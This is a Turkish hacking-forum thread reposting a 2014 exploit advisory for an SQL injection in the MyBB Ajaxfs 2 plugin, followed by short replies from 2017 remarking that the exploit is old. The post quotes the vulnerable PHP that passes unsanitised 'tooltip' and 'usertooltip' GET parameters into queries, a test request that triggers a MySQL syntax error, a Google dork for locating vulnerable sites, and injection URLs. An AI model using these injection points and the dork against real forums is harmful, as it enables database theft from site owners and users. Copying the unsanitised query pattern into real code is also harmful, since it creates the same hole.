Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Exploitler > Bug Researchers

Bug Researchers Yeni bulunan açıklar.



MyBB Ajaxfs 2 Plugin - SQL Injection Vulnerability

Bug Researchers

Yeni Konu aç Cevapla
 
Seçenekler
Alt 08-02-2014 17:44   #1
  • Özel Üye
  • Üye Bilgileri
Üyelik tarihi
01/2013
Nereden
İstanbul
Mesajlar
Konular

Teşekkür (Etti): 4227
Teşekkür (Aldı): 6361


MyBB Ajaxfs 2 Plugin - SQL Injection Vulnerability



Kod:
###########################
*
# Mybb Ajaxfs Plugin Sql Injection vulnerability
*
###########################
*
#################################
#
#**** @@@*** @@@@@@@@@@@*** @@@@@********** @@@@@@@@@@*********** @@@* @@@@@@@
#**** @@@*** @@@@@@@@@@@*** @@@* @@******** @@@**** @@*********** @@@* @@@@@@@@ 
#**** @@@*** @@@*********** @@@*** @@****** @@@****** @@********* @@@* @@@* @@@ 
#**** @@@*** @@@*********** @@@***** @@**** @@@**** @@*********** @@@* @@@* @@@ 
#**** @@@*** @@@@@@@@@@@*** @@@****** @**** @@@@@@@@@@*********** @@@* @@@@@@
#**** @@@*** @@@@@@@@@@@*** @@@**** @@***** @@@**** @@*********** @@@* @@@@@@
#**** @@@*** @@@*********** @@@** @@******* @@@****** @@** @@@*** @@@* @@@ @@@
#**** @@@*** @@@*********** @@@ @@********* @@@**** @@**** @@@*** @@@* @@@* @@@
#**** @@@*** @@@@@@@@@@@*** @@@@@********** @@@@@@@@@@**** @@@*** @@@* @@@** @@@
#
#####################################
**
# Exploit Title : Mybb Ajaxfs Plugin Sql Injection vulnerability
**
# Author : Iranian Exploit DataBase
**
# Discovered By : IeDb
**
# Email : [email protected]* -* [email protected]
**
# Home : http://iedb.ir** -** http://iedb.ir/acc
**
# Fb Page : https://www.facebook.com/pages/Exploit-And-Security-Team-iedbir/199266860256538
**
# Software Link : http://mods.mybb.com/download/ajax-forum-stat-v-2
**
# Security Risk : High
**
# Tested on : Linux
**
# Dork : inurl:ajaxfs.php
**
#################################
**
1)
**
**if(isset($_GET['tooltip']))
****{
****$pid=$_GET['tooltip'];
****$query_post = $db->query ("SELECT * FROM ".TABLE_PREFIX."posts WHERE pid='$pid'");
**
**
2)
**
*if(isset($_GET['usertooltip']))
****{
****$uid=$_GET['usertooltip'];
****$query_user = $db->query ("SELECT * FROM ".TABLE_PREFIX."users WHERE uid='$uid'");
**
http://localhost/Upload/ajaxfs.php?usertooltip=1'
**
****1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
**
Google DORK : inurl:ajaxfs.php
**
**
# Exploit :
**
# http://site.com/mybb/ajaxfs.php?tooltip=[sql]
**
# http://site.com/mybb/ajaxfs.php?usertooltip=[sql]
**
**
#################################
**
# Tnx To : All Member In Iedb.ir/acc & Iranian Hackers
**
#################################



___________________________________________

Sizin dediğiniz ”Vatan” dağda başlayıp çöplükte biter. Bizim bildiğimiz ”Vatan” yürekte başlayıp ”ŞEHADETLE” biter!

http://i.hizliresim.com/GkVJEb.gif

@blackspy_tht
blackspy@turkhackteam.info
 Offline  
 
Alıntı ile Cevapla
Teşekkür

ByBlueHacker ASDD Teşekkür etti.
Alt 27-08-2017 06:02   #2
  • Asteğmen
  • Üye Bilgileri
Üyelik tarihi
08/2017
Mesajlar
Konular

Teşekkür (Etti): 5
Teşekkür (Aldı): 1




Ellerine sağlık



___________________________________________

#####################################
VATANIN İÇİN YAŞA VATANIN İÇİN ÖL...
#####################################

 Offline  
 
Alıntı ile Cevapla
Alt 27-08-2017 07:25   #3
  • Tamamen Forumdan Uzaklaştırıldı
  • Üye Bilgileri
Üyelik tarihi
07/2017
Nereden
kobane
Mesajlar
Konular

Teşekkür (Etti): 13
Teşekkür (Aldı): 32




Eski bir exploit
 Offline  
 
Alıntı ile Cevapla
Alt 27-08-2017 07:26   #4
  • Yarbay
  • Üye Bilgileri
Üyelik tarihi
05/2013
Nereden
İstanbul
Mesajlar
Konular

Teşekkür (Etti): 968
Teşekkür (Aldı): 1746




Alıntı:
mrcsrcylmz´isimli üyeden Alıntı Mesajı göster
Eski bir exploit
Konu 2014de açılmıs güncel olmayacaktı ya



___________________________________________

En çok ne zoruma gidiyor biliyor musun? "Ülkem" diye kaydetmiştin beni telefonuna. Kalbimi parçalara ayırdın, hani vatan bölünmezdi?

Yokluğun bilinç altımdayken , varlığın kimin altında merak ediyorum.
 Offline  
 
Alıntı ile Cevapla
Alt 27-08-2017 07:30   #5
  • Asteğmen
  • Üye Bilgileri
Üyelik tarihi
08/2017
Mesajlar
Konular
2

Teşekkür (Etti): 6
Teşekkür (Aldı): 0




eline sağlık günümüzde de halen var ama hacklenmiyor zaten o yüzden var
 Offline  
 
Alıntı ile Cevapla
Alt 27-08-2017 09:22   #6
  • Yüzbaşı
  • Üye Bilgileri
Üyelik tarihi
06/2016
Mesajlar
Konular

Teşekkür (Etti): 230
Teşekkür (Aldı): 313




2014 teki bir konuya eline sağlık yazıp hortlatmakta ayrı bir ironi



___________________________________________

 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
instagram takipci hilesi

wau